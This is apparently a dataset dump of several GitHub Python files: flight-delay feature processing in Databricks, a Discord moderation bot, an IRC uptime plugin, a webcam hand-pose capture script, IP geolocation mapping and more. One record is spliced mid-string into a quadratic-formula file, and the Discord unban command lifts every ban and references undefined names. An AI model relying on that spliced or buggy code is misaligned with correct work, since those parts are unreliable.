_lon_lat_alt_to_pixel_x_y_native(self, lons, lats, alts, band=None):\n if self._lons_1d is None:\n self._lons_1d = numpy.ravel(self._lons)\n if self._lats_1d is None:\n self._lats_1d = numpy.ravel(self._lats)\n if self._kd_tree is None:\n kd_tree_data = numpy.transpose((self._lons_1d, self._lats_1d))\n self._kd_tree = cKDTree(kd_tree_data)\n\n distances, indices_1d = self._kd_tree.query(numpy.asarray((lons, lats)).transpose(), 6)\n indices_2d = numpy.unravel_index(indices_1d, (self._npix_y, self._npix_x))\n\n # Perform the interpolation here using an inverse distance weighted method\n distances[numpy.isclose(distances, 0)] = 0.00000001\n inv_distances = 1 / distances\n inv_distances_sum = numpy.sum(1 / distances, axis=1)\n interpolated_y_vals = numpy.sum(inv_distances * indices_2d[0], axis=1) / inv_distances_sum\n interpolated_x_vals = numpy.sum(inv_distances * indices_2d[1], axis=1) / inv_distances_sum\n return interpolated_x_vals, interpolated_y_vals\n\n","repo_name":"BeamIO-Inc/resippy","sub_path":"resippy/image_objects/earth_overhead/earth_overhead_point_calculators/igm_point_calc.py","file_name":"igm_point_calc.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"}
+{"seq_id":"32168944737","text":"\n\n# coding: utf-8\n\n\n# Create a image\n\n\nfrom PIL import Image, ImageDraw, ImageFont, ImageFilter\nimport random\n\ndef get_rnd_color():\n\treturn (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n\ndef get_rnd_code(n):\n\tcode = ''\n\tfor i in range(n):\n\t\tcode = code + str(chr(random.randint(65, 90)))\n\treturn code\n\nwidth, height = 150, 50\n\nimage = Image.new('RGB', (width, height))\n\ndraw = ImageDraw.Draw(image)\n\nfor i in range(width):\n\tfor j in range(height):\n\t\tdraw.point((i, j), get_rnd_color())\n\nfont = ImageFont.truetype('arial.ttf', 25)\n\ndraw.text((10, 10), get_rnd_code(7), fill=(255, 255, 255, 1), font=font)\n# image = image.filter(ImageFilter.BLUR)\n\n\nimage.save('./code.png')\n\n\n","repo_name":"renhongl/python_demo","sub_path":"python_demo_v1/study/study_image_lib.py","file_name":"study_image_lib.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"16387521735","text":"# Databricks notebook source\n# import libraries\nimport pyspark.sql.functions as F\nfrom pyspark.sql.types import *\nfrom datetime import datetime\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nfrom pyspark.sql import functions as f\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.functions import monotonically_increasing_id\nfrom pyspark.sql.functions import isnan, when, count, col, isnull, percent_rank, avg, mean\nfrom pyspark.sql.functions import min\nfrom pyspark.sql.functions import col, max\nfrom pyspark.sql.functions import format_string\nfrom pyspark.sql.functions import substring\nfrom pyspark.sql.functions import concat_ws\nfrom pyspark.sql.functions import concat\nfrom pyspark.sql.functions import to_timestamp\nfrom pyspark.sql.functions import lit\nfrom pyspark.sql.functions import to_utc_timestamp\nfrom pyspark.sql.functions import expr\nfrom pyspark.sql.functions import regexp_replace\nfrom pyspark.sql.functions import instr\nfrom pyspark.sql.functions import row_number\nfrom pyspark.sql.window import Window\nfrom pyspark.sql.types import IntegerType\n\nfrom pyspark.ml.linalg import DenseVector, SparseVector, Vectors\nfrom pyspark.ml.feature import VectorAssembler, StandardScaler, StringIndexer,OneHotEncoder\nfrom pyspark.ml.classification import MultilayerPerceptronClassifier\n\n\nfrom pyspark.ml import Pipeline\nfrom pyspark.ml.tuning import CrossValidator, ParamGridBuilder\nfrom pyspark.ml.classification import GBTClassifier\n\nfrom pyspark.ml.classification import RandomForestClassifier, DecisionTreeClassifier, LogisticRegression\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator, BinaryClassificationEvaluator\n\n# COMMAND ----------\n\n#Initializes blob storage credentials/location\nblob_container = \"w261-sec4-group2\" # The name of your container created in https://portal.azure.com\nstorage_account = \"kdevery\" # The name of your Storage account created in https://portal.azure.com\nsecret_scope = \"sec4-group2\" # The name of the scope created in your local computer using the Databricks CLI\nsecret_key = \"w261-key\" # The name of the secret key created in your local computer using the Databricks CLI \nblob_url = f\"wasbs://{blob_container}@{storage_account}.blob.core.windows.net\"\nmount_path = \"/mnt/mids-w261\"\n\n#Points to SAS token\nspark.conf.set(\n f\"fs.azure.sas.{blob_container}.{storage_account}.blob.core.windows.net\",\n dbutils.secrets.get(scope = secret_scope, key = secret_key)\n)\n\n# COMMAND ----------\n\n# Read in training and test data\n\ntrain_df = spark.read.parquet(f\"{blob_url}/train_data_with_adv_features\").cache()\ntest_df = spark.read.parquet(f\"{blob_url}/test_data_with_adv_features\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC #Process Validation Folds\n\n# COMMAND ----------\n\n#feature processing of dfs\n\ntrain_df=train_df.select(\"*\", f.row_number().over(Window.partitionBy().orderBy(\"Date_Time_sched_dep_utc\")).alias(\"Index\"))\ntrain_df = train_df.withColumn(\"holiday_period\", train_df[\"holiday_period\"].cast(IntegerType()))\ntest_df = test_df.withColumn(\"holiday_period\", test_df[\"holiday_period\"].cast(IntegerType()))\n\n# COMMAND ----------\n\n#string indexing of carrier\ncarrier_indexer = StringIndexer(inputCol=\"OP_CARRIER\", outputCol=\"OP_CARRIER_Index\")\ntrain_df = carrier_indexer.fit(train_df).transform(train_df)\n\n\n#one hot encoding\nonehotencoder_carrier_vector = OneHotEncoder(inputCol=\"OP_CARRIER_Index\", 
outputCol=\"carrier_vec\")\ntrain_df = onehotencoder_carrier_vector.fit(train_df).transform(train_df)\n\n# COMMAND ----------\n\n#splitting training dataframe into five folds contained in dictionary \"d\"\n\nd = {}\nfolds = ['df1','df2','df3','df4','df5']\n\neach_len = train_df.count()/5\nstart = 1\nval_size = each_len/5\nstop = each_len\nprecision_list = []\n\nfor fold in folds:\n d[fold] = train_df.filter(col('Index').between(start,stop))\\\n .withColumn('cv', F.when(col('Index').between(start,(stop-val_size)), 'train')\n .otherwise('val'))\n start += each_len\n stop += each_len\n\n \n\n# COMMAND ----------\n\ntrain_df.createOrReplaceTempView('train_view')\n\n# COMMAND ----------\n\n# MAGIC %sql \n# MAGIC \n# MAGIC SELECT holiday_period,mean_carrier_delay,Pagerank_Score,\n# MAGIC PREV_FLIGHT_DELAYED,origin_percent_delayed,\n# MAGIC dest_percent_delayed,\n# MAGIC ORIGIN_Prophet_trend,\n# MAGIC ORIGIN_Prophet_pred,\n# MAGIC DEST_Prophet_trend,\n# MAGIC DEST_Prophet_pred\n# MAGIC FROM train_view\n# MAGIC LIMIT 10\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC SELECT COUNT(*)\n# MAGIC FROM train_view\n# MAGIC WHERE ORIGIN_Prophet_trend IS NULL\n\n# COMMAND ----------\n\ndisplay(train_df)\n\n# COMMAND ----------\n\ntrain_df.columns\n\n# COMMAND ----------\n\ndef process_fold_df(fold_df):\n \n \n #imputation\n fold_df.createOrReplaceTempView(\"fold_view\")\n \n imputation_columns = ['CRS_ELAPSED_TIME','HourlyAltimeterSetting','HourlyDewPointTemperature',\n 'HourlyDryBulbTemperature','HourlyRelativeHumidity','HourlySeaLevelPressure',\n 'HourlyStationPressure','HourlyVisibility','HourlyWetBulbTemperature',\n 'HourlyWindDirection','mean_carrier_delay','ORIGIN_Prophet_trend',\n 'ORIGIN_Prophet_pred','DEST_Prophet_trend','DEST_Prophet_pred',]\n\n means = {}\n\n for impute_col in imputation_columns:\n mean = spark.sql(f\"SELECT AVG({impute_col}) FROM fold_view\").collect()[0][0]\n means[impute_col] = mean\n \n print(means)\n \n #fill Nones and Nans - Seems to error sometimes?\n fold_df = fold_df.fillna(0,[\"HourlyWindGustSpeed\"]) \\\n .fillna(means[\"CRS_ELAPSED_TIME\"],[\"CRS_ELAPSED_TIME\"]) \\\n .fillna(means[\"HourlyAltimeterSetting\"],[\"HourlyAltimeterSetting\"]) \\\n .fillna(means[\"HourlyDewPointTemperature\"],[\"HourlyDewPointTemperature\"]) \\\n .fillna(means[\"HourlyDryBulbTemperature\"],[\"HourlyDryBulbTemperature\"]) \\\n .fillna(0,[\"HourlyPrecipitation\"]) \\\n .fillna(means[\"HourlyRelativeHumidity\"],[\"HourlyRelativeHumidity\"]) \\\n .fillna(means[\"HourlySeaLevelPressure\"],[\"HourlySeaLevelPressure\"]) \\\n .fillna(means[\"HourlyStationPressure\"],[\"HourlyStationPressure\"]) \\\n .fillna(means[\"HourlyVisibility\"],[\"HourlyVisibility\"]) \\\n .fillna(means[\"HourlyWetBulbTemperature\"],[\"HourlyWetBulbTemperature\"]) \\\n .fillna(means[\"HourlyWindDirection\"],[\"HourlyWindDirection\"]) \\\n .fillna(0,[\"HourlyWindSpeed\"]) \\\n .fillna(\"\",[\"TAIL_NUM\"])\\\n .fillna(0,['holiday_period'])\\\n .fillna(means['mean_carrier_delay'],['mean_carrier_delay'])\\\n .fillna(0,['PREV_FLIGHT_DELAYED'])\\\n .fillna(0,['origin_percent_delayed'])\\\n .fillna(0,['dest_percent_delayed'])\\\n .fillna(means['ORIGIN_Prophet_trend'],['ORIGIN_Prophet_trend'])\\\n .fillna(means['ORIGIN_Prophet_pred'],['ORIGIN_Prophet_pred'])\\\n .fillna(means['DEST_Prophet_trend'],['DEST_Prophet_trend'])\\\n .fillna(means['DEST_Prophet_pred'],['DEST_Prophet_pred'])\n \n\n \n #vector assembler\n feature_cols = 
['MONTH','DAY_OF_MONTH','DAY_OF_WEEK','DISTANCE','HourlyWindSpeed','Rain','Blowing','Snow','Thunder','CloudySkyCondition','carrier_vec', 'holiday_period','mean_carrier_delay','Pagerank_Score','PREV_FLIGHT_DELAYED','origin_percent_delayed','dest_percent_delayed','ORIGIN_Prophet_trend','ORIGIN_Prophet_pred','DEST_Prophet_trend','DEST_Prophet_pred']\n #assemble = VectorAssembler(inputCols=feature_cols, outputCol='features')\n #outputCol = \"features\"\n df_va = VectorAssembler(inputCols = feature_cols, outputCol = 'feature_vector')\n model_input = df_va.transform(fold_df)\n \n #rename delay flag to label\n model_input = model_input.withColumnRenamed(\"DEP_DEL15\",\"label\")\n #model_input = assemble.transform(fold_df) \\\n # .withColumnRenamed('DEP_DEL15', 'label')\n \n #scaling\n scaler=StandardScaler().setInputCol(\"feature_vector\").setOutputCol(\"scaled_feature_vector\")\n model_input = scaler.fit(model_input).transform(model_input)\n \n #check if cv exists, should only exist for cross fold validation not on full train, test\n if 'cv' in model_input.columns:\n model_input = model_input.select('label', 'scaled_feature_vector','cv')\n else:\n model_input = model_input.select('label', 'scaled_feature_vector')\n \n return model_input\n\n# COMMAND ----------\n\nd_processed = {}\nfor key in d.keys():\n print(key)\n d_processed[key] = process_fold_df(d[key])\n\n# COMMAND ----------\n\n# commented out to ensure no overwrite if run all is pressed\n\n# d_processed['df1'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_1\")\n# d_processed['df2'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_2\")\n# d_processed['df3'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_3\")\n# d_processed['df4'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_4\")\n# d_processed['df5'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_5\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC #Process Full Train and Test Sets\n\n# COMMAND ----------\n\n# Read in training and test data\n\ntrain_df = spark.read.parquet(f\"{blob_url}/train_data_with_adv_features\").cache()\ntest_df = spark.read.parquet(f\"{blob_url}/test_data_with_adv_features\")\n\n# COMMAND ----------\n\n#string indexing of carrier for train\ncarrier_indexer = StringIndexer(inputCol=\"OP_CARRIER\", outputCol=\"OP_CARRIER_Index\")\nindexer_transformer = carrier_indexer.setHandleInvalid(\"keep\").fit(train_df)\ntrain_df = indexer_transformer.transform(train_df)\n\n#one hot encoding for train\nonehotencoder_carrier_vector = OneHotEncoder(inputCol=\"OP_CARRIER_Index\", outputCol=\"carrier_vec\")\nonehotencoder_transformer = onehotencoder_carrier_vector.fit(train_df)\ntrain_df = onehotencoder_transformer.transform(train_df)\n\n# COMMAND ----------\n\ndisplay(train_df)\n\n# COMMAND ----------\n\n#string indexing of carrier for test\n#one hot encoding for test\ntest_df = indexer_transformer.transform(test_df)\ntest_df = onehotencoder_transformer.transform(test_df)\n\n# COMMAND ----------\n\nlen(indexer_transformer.labels)\n\n# COMMAND ----------\n\n#cast holiday to integer\ntrain_df = train_df.withColumn(\"holiday_period\", train_df[\"holiday_period\"].cast(IntegerType()))\ntest_df = test_df.withColumn(\"holiday_period\", test_df[\"holiday_period\"].cast(IntegerType()))\n\n# COMMAND ----------\n\nprocessed_train_df = process_fold_df(train_df)\n\n#scale to train on train set\n# scaler=StandardScaler().setInputCol(\"feature_vector\").setOutputCol(\"scaled_feature_vector\")\n# 
scaler_transformer = scaler.fit(processed_train_df)\n# processed_train_df = scaler_transformer.transform(processed_train_df)\n\nprocessed_test_df = process_fold_df(test_df)\n# #scale to train on test set\n# processed_test_df = scaler_transformer.transform(processed_test_df)\n\n\n# COMMAND ----------\n\nprocessed_test_df1 = processed_test_df.withColumn(\"index\", monotonically_increasing_id()) \n\n# COMMAND ----------\n\ndisplay(processed_train_df)\n\n# COMMAND ----------\n\ndisplay(processed_test_df1)\n\n# COMMAND ----------\n\nprocessed_test_df.count()\n\n# COMMAND ----------\n\n# commented out to ensure no overwrite if run all is pressed\n\n# processed_train_df.write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_train\")\n# processed_test_df.write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_test\")\n\n# COMMAND ----------\n\ndisplay(dbutils.fs.ls(f\"{blob_url}\"))\n\n# COMMAND ----------\n\n","repo_name":"cmunugala/flight-delay","sub_path":"Model_building/Process_data.py","file_name":"Process_data.py","file_ext":"py","file_size_in_byte":11443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71774486568","text":"import csv\n\nwith open('stage3_test.csv', newline='') as csv_in, open(\"10000 int:\r\n \"\"\"\r\n Calcula e retorna o valor do delta.\r\n \"\"\"\r\n\r\n return (b**2) - (4*a*c)\r\n\r\n\r\ndef calculate_bhaskara(a: int, b: int, c: int) -> Tuple[float, float]:\r\n \"\"\"\r\n Calcula e retorna o resultado da formula de bhaskara. \r\n \"\"\"\r\n\r\n assert isinstance(a, int), \"o valor do coeficiente a nao eh inteiro\"\r\n assert a != 0, \"o valor do coeficiente a nao pode ser igual a 0\"\r\n assert isinstance(b, int), \"o valor do coeficiente b nao eh inteiro\"\r\n assert isinstance(c, int), \"o valor do coeficiente c nao eh inteiro\"\r\n\r\n\r\n delta = calculate_delta(a=a, b=b, c=c)\r\n\r\n if delta < 0:\r\n print(f\"A equacao nao possui raizes pertencentes ao conjunto dos numeros reais, pois delta = {round(delta, 2)} < 0\")\r\n return\r\n \r\n x1 = ((-b) + (sqrt(delta))) / (2*a)\r\n x2 = ((-b) - (sqrt(delta))) / (2*a)\r\n\r\n print(f\"As raizes da equacao {a}(x^2) {'+' if b > 0 else ''}{b}(x) {'+' if c > 0 else ''}{c} sao x1 = {round(x1, 2)} e x2 = {round(x2, 2)}\")\r\n\r\n return x1, x2\r\n\r\n\r\nif __name__ == \"__main__\":\r\n \"\"\"\r\n Modifique os valores de a, b e c a sua escolha.\r\n \"\"\"\r\n\r\n a = -1\r\n b = 6\r\n c = -9\r\n\r\n calculate_bhaskara(a=a, b=b, c=c)","repo_name":"eliasciceros/criando_apis_em_python","sub_path":"atividade_1/formula_de_Bhaskara.py","file_name":"formula_de_Bhaskara.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23932554674","text":"#=========================================================\n#\t\t\t\t\tBiblio\n#=========================================================\n\nimport discord # Импортируем библиотеку дискорд\nfrom discord.ext import commands \nfrom discord.utils import get\nfrom config import config # импортируем переменную конфиг\nimport json\nimport random\n\n#=========================================================\n#\t\t\t\t\tEvents\n#=========================================================\n\nclient = commands.Bot(command_prefix = config['prefix'])\nclient.remove_command('help')\n\n@client.event\nasync def on_ready():\n\tprint('[LOG] Bot a online!') # Пишем в консоль о том что бот работает\n\n\tawait client.change_presence( status = discord.Status.online, activity = discord.Game('Discord')) # статус\n\n\n#=========================================================\n#\t\t\t\t\tCode\n#=========================================================\n#=========================================================\n#\t\t\t\t\tКоманда \"Kick\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def kick(ctx, member: discord.Member = None, *, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tawait member.kick( reason = reason)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Kick\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот кикнул пользователя {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\n#=========================================================\n#\t\t\t\t\tКоманда \"Ban\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def ban( ctx, member: discord.Member, *, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tawait member.ban( reason = reason)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Ban\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот забанил игрока {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\n#=========================================================\n#\t\t\t\t\tКоманда \"Mute\"\n#p.s. создайте роль \"Mute\" для начала\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def mute( ctx, member: discord.Member, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tmute_role = discord.utils.get(ctx.message.guild.roles, name = 'Mute')\n\n\tawait member.add_roles(mute_role)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Mute\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот дал мут игроку {member.mention}. 
Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\t\n\n#=========================================================\n#\t\t\t\t\tКоманда \"Unmute\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def unmute( ctx, member: discord.Member, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tmute_role = discord.utils.get(ctx.message.guild.roles, name = 'Mute')\n\n\tawait member.remove_roles(mute_role)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Unmute\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот убрал мут с игрока {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\t\n#=========================================================\n#\t\t\t\t\tКоманда \"Unban\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def unban(ctx, *, member, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tbanned_users = await ctx.guild.bans()\n\n\tfor banned_entry in banned_users:\n\t\tuser = banned_entry.user\n\n\t\tawait ctx.guild.unban(user)\n\t\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Unban\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот разбанил игрока {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\t\n\n\t\treturn\n\n#=========================================================\n#\t\t\t\t\tКоманда \"Clear\"\n#=========================================================\n@client.command()\n@commands.has_permissions( administrator = True)\nasync def clear(ctx, amount=5):\n\tawait ctx.channel.purge(limit=amount)\n\n#=========================================================\n#\t\t\t\t\tКоманда \"changestatus\"\n#=========================================================\n@client.command()\n@commands.has_permissions( administrator = True )\nasync def changestatus( ctx, statustype:str = None, *, arg:str = None):\n if statustype is None: # Type Check\n await ctx.send( 'Вы не указали тип Статуса' )\n elif arg is None: # Arg Check\n await ctx.send( 'Вы не указали нужный аргумент' )\n else:\n if statustype.lower() == 'game': # Game\n await Bot.change_presence (activity=discord.Game( name = arg) )\n elif statustype.lower() == 'listen': # Listen\n await Bot.change_presence( activity=discord.Activity( type=discord.ActivityType.listening, name = arg) )\n elif statustype.lower() == 'watch': # Watch\n await Bot.change_presence( activity=discord.Activity( type=discord.ActivityType.watching, name = arg) )\n#=========================================================\n#\t\t\t\t\tRun a bot\n#=========================================================\nclient.run(config['token'])\n","repo_name":"JoJoDevelopers/code.py","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73699160167","text":"import time\nimport sys\nimport os\nimport pyircbot\nfrom datetime import timedelta\n\nif len(sys.argv) < 2:\n print(\"Port!\")\n sys.exit(2)\n\nPORT=int(sys.argv[1])\n\ndef load_token(fname):\n path = os.path.expanduser(fname)\n with open(path, 'r') as f:\n token = f.readlines()[0].strip()\n\n return token\n\ndef onMessage(bot, message):\n if message.command != \"PRIVMSG\":\n return\n\n CMD = \"!osuptime\"\n if not message.params[1][:len(CMD)] == CMD:\n return\n\n with open('/proc/uptime', 'r') as f:\n uptime_seconds = float(f.readline().split()[0])\n uptime_string = str(timedelta(seconds = uptime_seconds)) \n\n uptime_msg = \"{color} Host system uptime: {uptime}! {reset}\".format(\n color=chr(0x03) + '07,01',\n reset=chr(0x0F),\n uptime=uptime_string \n )\n\n resp = pyircbot.IRCMessage()\n resp.command = \"PRIVMSG\"\n resp.params = [pyircbot.response_destination(message), uptime_msg]\n bot.sendIrcMessage(resp)\n\nplugin = pyircbot.Plugin()\nplugin.name='leettime'\nplugin.token=load_token('~/ircbot_token')\nplugin.onMessage = onMessage\n\nbot = pyircbot.Bot('127.0.0.1', PORT, plugin)\nbot.start()\n\nsent = False\nwhile bot.isRunning():\n time.sleep(0.1)\n\nbot.wait()\n","repo_name":"kolodziej/ircbot","sub_path":"py-plugins/osuptime.py","file_name":"osuptime.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22215503466","text":"# 从摄像头出采集手势照片,用作训练集与测试集\n# 基于opencv\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport time\nimport sys, os, re\nimport cv2\n\n# 清空特定文件夹内的文件\ndef clear_dir(path='.\\dataset\\HAND POSE'):\n print(\"start trying to clean the path\")\n time.sleep(1)\n files = os.listdir(path) # 得到文件夹下所有文件的名称\n if len(files) == 0:\n print(\"dir already cleaned\")\n time.sleep(2)\n else:\n for fi in files:\n os.remove(path + '\\\\' + fi)\n files = os.listdir(path)\n if len(files) == 0:\n print(\"successfully clean the dir\")\n time.sleep(2) \n\n# 控制摄像头捕获视频\n# 图片默认存放路径: .\\dataset\\HAND POSE\ndef control_camera(pic_number=10, path='.\\dataset\\HAND POSE'):\n n = 0 # 记录以拍摄的照片\n n1 = 0\n cap1 = cv2.VideoCapture(0) # 用于监控摄像头\n # 清空目标目录\n clear_dir(path)\n path = '.\\dataset\\HAND POSE' + '\\\\'\n print(\"start record picture\")\n\n while(True):\n # 当储存文件的数量达到所需的数量时,退出循环\n if n >= pic_number:\n print(\"reach the picture number\")\n print(\"ending the process\")\n time.sleep(1.5)\n break\n \n # 判断循环开始\n if n > n1:\n n1 = n\n print(\"Start record new picture\")\n\n # capture frame-by-frame\n ret, frame = cap1.read()\n # 绘制输入框\n cv2.rectangle(frame, (200, 120),(440, 360), (255, 0, 0),3) # 确定左上点, 右下点的宽,高以及线宽\n # Display the resulting frame\n cv2.imshow('capture', frame)\n \n # press q to quit the while loop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n print(\"exit\")\n time.sleep(1)\n break\n # when the number of photo larger than the setted value\n\n # 键入相应的键盘按键时,从摄像头中保存相应的图片\n if cv2.waitKey(1) & 0xFF == ord('a'):\n n += 1\n cv2.imwrite(path + str(n) + '-a.jpg', frame)\n print('saving image: ' + str(n) + '-a.jpg')\n print(\"n: \", n)\n print()\n continue\n \n if cv2.waitKey(1) & 0xFF == ord('s'):\n n += 1\n cv2.imwrite(path + str(n) + '-s.jpg', frame)\n print('saving image: ' + str(n) + '-s.jpg')\n print(\"n: \", n)\n print()\n continue\n\n if cv2.waitKey(1) & 0xFF == ord('d'):\n n += 1\n cv2.imwrite(path + str(n) + '-d.jpg', frame)\n print('saving image: ' + str(n) + '-d.jpg')\n print(\"n: \", n)\n print()\n continue\n\n if cv2.waitKey(1) & 0xFF == ord('w'):\n n += 1\n cv2.imwrite(path + str(n) + '-w.jpg', frame)\n print('saving image: ' + str(n) + '-d.jpg')\n print(\"n: \", n)\n print()\n continue\n\n if cv2.waitKey(1) & 0xFF == ord('o'):\n n += 1\n cv2.imwrite(path + str(n) + '-o.jpg', frame)\n print('saving image: ' + str(n) + '-o.jpg')\n print(\"n: \", n)\n print()\n continue \n \n cap1.release()\n cv2.destroyAllWindows()\n print(\"The final picture number: \", n)\n print(\" \")\n time.sleep(1)\n \n# 图片前处理, 同时读取出每张图片的标签并储存\n# 获取图像ROI,尺寸初设为240*240,在进行进一步缩小至120*120\n# 对图片重命名,同时将图片编号与label保存并导出到csv文件中\ndef pic_preprocess(path='.\\dataset\\HAND POSE'):\n files = os.listdir(path) # 得到文件夹下所有文件的名称\n # 若无照片文件存在\n if len(files) == 0:\n print(\"no picture exists\")\n return 0\n else:\n print(\"start the picture preprocessing in \" + path)\n time.sleep(1)\n label = []\n column_name = ['label_id','pic_label']\n\n for fi in files:\n if (re.match('.*?\\.(\\w+)', fi).group(1)) == 'jpg':\n print(\"treating \" + fi)\n # 分割文件文件名,并将其储存到label_id和label_set中\n var = re.match('(\\d+)-(a|s|d|w|o).jpg', fi)\n label.append([int(var.group(1)), var.group(2)])\n\n # 对图片进行尺寸处理\n current_file = path + '\\\\' + fi\n img = cv2.imread(current_file)\n if img.size >= 100000: # 确认图片是否在处理前或处理后\n print(\"Before treatment: \", img.shape, img.size, img.dtype) # 获取图像属性 \n img = img[120:360, 200:440] # 获取图像ROI\n img = cv2.resize(img, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_LINEAR) # 
图像缩放,采用设置缩放因子的形式\n print(\"After treatment: \", img.shape, img.size, img.dtype)\n cv2.imwrite(current_file, img)\n\n # 单张照片处理结束\n print(\"finish treating \" + fi)\n print()\n else:\n # 跳过\n print(\"skip \" + fi)\n print()\n\n # break # 用于调试\n\n # 存入到labels中并导出为csv文件\n labels = pd.DataFrame(data=label, columns=column_name)\n labels = labels.sort_values(by = 'label_id', ascending=True)\n # print(labels)\n labels.to_csv(path + '\\\\' + 'labels.csv', encoding='gbk')\n return labels\n\n# 收集得到的图片进行重命名\ndef try_rename(path='.\\dataset\\HAND POSE'):\n files = os.listdir(path) # 得到文件夹下所有文件的名称\n # 若无照片文件存在\n if len(files) == 0:\n print(\"no picture exists\")\n return 0\n else:\n print(\"rename all pic files\")\n time.sleep(0.5)\n for fi in files:\n if (re.match('.*?\\.(\\w+)', fi).group(1)) == 'jpg':\n var = re.match('(\\d+)-(a|s|d|w|o).jpg', fi)\n os.rename(path+ '\\\\' +fi, path+ '\\\\' +var.group(1) + '.jpg')\n\n\n# get_pic主程序\ndef pic_main(number=100):\n control_camera(pic_number=number)\n print(\"picture capture finish.\")\n print()\n time.sleep(0.5)\n pic_preprocess()\n print(\"picture preprocess finish.\")\n print()\n time.sleep(0.5)\n try_rename()\n print(\"picture rename finish.\")\n print()\n time.sleep(0.5)\n\nif __name__ == \"__main__\":\n n = 50\n # control_camera(pic_number=n)\n # pic_preprocess()\n # try_rename()\n pic_main(number=n)\n\n\n'''\n # opencv库基本摄像头操作\n cap = cv2.VideoCapture(0) # 创建摄像头对象\n print(type(cap))\n # 逐帧显示视频播放\n while(True):\n # 利用read()函数读取视频的某帧\n ret, frame = cap.read()\n # 展示\n cv2.imshow('capture', frame)\n # 若检测到键盘键入q,则退出\n if cv2.waitKey(1) & 0xFF == ord('q'):\n # 释放摄像头对象和窗口\n cap.release()\n cv2.destroyAllWindows()\n break\n'''","repo_name":"Alexnll/Hand-Pose-Estimation","sub_path":"get_pic.py","file_name":"get_pic.py","file_ext":"py","file_size_in_byte":7207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"12850707045","text":"import geocoder\nimport folium\n\n# معرفة الاشخاص عن طريق الخريطة \n\n\n# هذا الكود عبارة متغير + عنوان الايبي الخاص بي \nour_ip = geocoder.ip(\"me\")\n\n#متغير يسمي الموقع ثم اعطيه الايبي \nlocation = our_ip.latlng\n\n# متغير الخريطة ثم اعطيه الموقع + حجم التكبير \nour_map = folium.Map(location=location, zoom_start=10)\n\n#هذا الكود يضع الموقع علي الخريطة \nfolium.Marker(location).add_to(our_map)\n\n# هذا الكود يضع بيانات الخريطة في صفحة بمتداد اتش تي ام ايل\nour_map.save(\"map.html\")\n\n#هنا نطبع الموقع \nprint(location)","repo_name":"waleed-nemer/python-socket","sub_path":"معرفة مكان اي شخص علي الخريطة/client1.py","file_name":"client1.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"ar","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
